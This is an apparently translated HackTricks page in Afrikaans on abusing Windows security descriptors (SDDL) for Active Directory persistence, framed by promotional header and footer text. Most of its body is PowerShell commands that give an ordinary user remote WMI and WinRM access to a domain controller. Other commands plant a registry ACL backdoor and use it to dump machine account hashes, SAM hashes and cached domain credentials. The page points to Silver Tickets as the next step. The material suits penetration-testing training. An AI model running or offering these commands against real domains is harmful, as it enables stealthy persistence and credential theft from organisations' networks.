5.3 KiB
Sekuriteitsbeskrywings
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy in HackTricks wil adverteer of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Sekuriteitsbeskrywings
Volgens die dokumentasie: Sekuriteitsbeskrywingsdefinisie-taal (SDDL) definieer die formaat wat gebruik word om 'n sekuriteitsbeskrywing te beskryf. SDDL gebruik ACE-reekse vir DACL en SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
Die sekuriteitsbeskrywings word gebruik om die regte wat 'n voorwerp oor 'n voorwerp het, te stoor. As jy net 'n klein verandering in die sekuriteitsbeskrywing van 'n voorwerp kan maak, kan jy baie interessante regte oor daardie voorwerp verkry sonder om lid van 'n bevoorregte groep te wees.
Hierdie volhardingstegniek is dus gebaseer op die vermoë om elke nodige reg teenoor sekere voorwerpe te wen, om 'n taak uit te voer wat gewoonlik administratiewe regte vereis sonder om administrateur te wees.
Toegang tot WMI
Jy kan 'n gebruiker toegang gee om WMI op afstand uit te voer deur hierdie te gebruik:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
Toegang tot WinRM
Gee toegang tot die winrm PS-konsole aan 'n gebruiker deur hierdie skakel** te gebruik:**
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
Afstandstoegang tot hasings
Kry toegang tot die register en dump hasings deur 'n Reg agterdeur te skep met behulp van DAMP, sodat jy te eniger tyd die hash van die rekenaar, die SAM en enige gekaste AD-geloofsbriewe op die rekenaar kan herwin. Dit is baie nuttig om hierdie toestemming aan 'n gewone gebruiker teen 'n Domeinbeheerder-rekenaar te gee:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Kyk na Silver Tickets om te leer hoe jy die has van die rekenaarrekening van 'n Domeinbeheerder kan gebruik.
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslagplekke.